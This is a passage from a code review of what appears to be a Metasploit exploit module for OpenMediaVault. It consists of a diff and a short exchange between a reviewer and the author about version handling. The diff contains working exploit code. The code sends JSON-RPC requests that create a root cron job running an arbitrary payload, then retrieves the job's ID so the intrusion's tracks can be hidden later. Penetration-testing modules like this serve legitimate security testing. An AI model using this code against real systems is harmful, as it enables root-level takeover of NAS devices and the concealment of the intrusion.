modules/exploits/unix/webapp/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,384 @@
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        },
+        options: nil
+      }.to_json
+    elsif @version_number >= Rex::Version.new('0.2.6.4')
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: {
+          uuid: uuid,
+          enable: true,
+          minute: schedule,
+          everynminute: false,
+          hour: schedule,
+          everynhour: false,
+          dayofmonth: schedule,
+          everyndayofmonth: false,
+          month: schedule,
+          dayofweek: schedule,
+          username: 'root',
+          command: cmd.to_s, # payload
+          sendemail: false,
+          comment: '',
+          type: 'userdefined'
+        }
+      }.to_json
+    else
+      post_data = {
+        service: 'Cron',
+        method: 'set',
+        params: [
+          {
+            uuid: uuid,
+            minute: schedule,
+            hour: schedule,
+            dayofmonth: schedule,
+            month: schedule,
+            dayofweek: schedule,
+            username: 'root',
+            command: cmd.to_s, # payload
+            comment: '',
+            type: 'userdefined'
+          }
+        ]
+      }.to_json
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'rpc.php'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => post_data
+    })
+    fail_with(Failure::Unknown, 'Cannot access cron services to schedule payload execution.') unless rpc_success?(res)
+
+    # parse json response and get the uuid of the cron entry
+    # we need this later to clean up and hide our tracks
+    res_json = res.get_json_document
+    @cron_uuid = res_json.dig('response', 'uuid') || ''
+
+    # In early versions up to 0.4.x cron uuid does not get returned so try an extra query to get it
+    if @cron_uuid.blank?
+      if @version_number >= Rex::Version.new('0.2.6.4')
+        method = 'getList'
+      else
+        method = 'getListByType'
+      end
+      post_data = {
+        service: 'Cron',
+        method: method,
+        params: {
+          start: 0,
+          limit: -1,
+          sortfield: nil,
+          sortdir: nil,
+          type: ['userdefined']
+        }
+      }.to_json
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'rpc.php'),
+        'method' => 'POST',
+        'ctype' => 'application/json',
+        'keep_cookies' => true,
+        'data' => post_data
+      })
+      res_json = res.get_json_document
+      # get total list of entries and pick the last one
+      index = res_json.dig('response', 'total')
+      @cron_uuid = res_json.dig('response', 'data', index - 1, 'uuid') || ''
+    end
+
+    # Apply and update cron configuration to trigger payload execution (1 minute)
+    # versions lower then 0.5.48 do not need this because execution is automatic
```

Comment:
I'm not sure to understand this comment. Does it mean if the version is lower than 0.5.48, `apply_config_changes` should not be called?

Reply:
Correct. For versions below 0.5.48, it seems not applicable, but I do not know the exact version where this has changed. It was not mentioned in the release updates. So I just make the call anyhow to be sure that all versions are covered.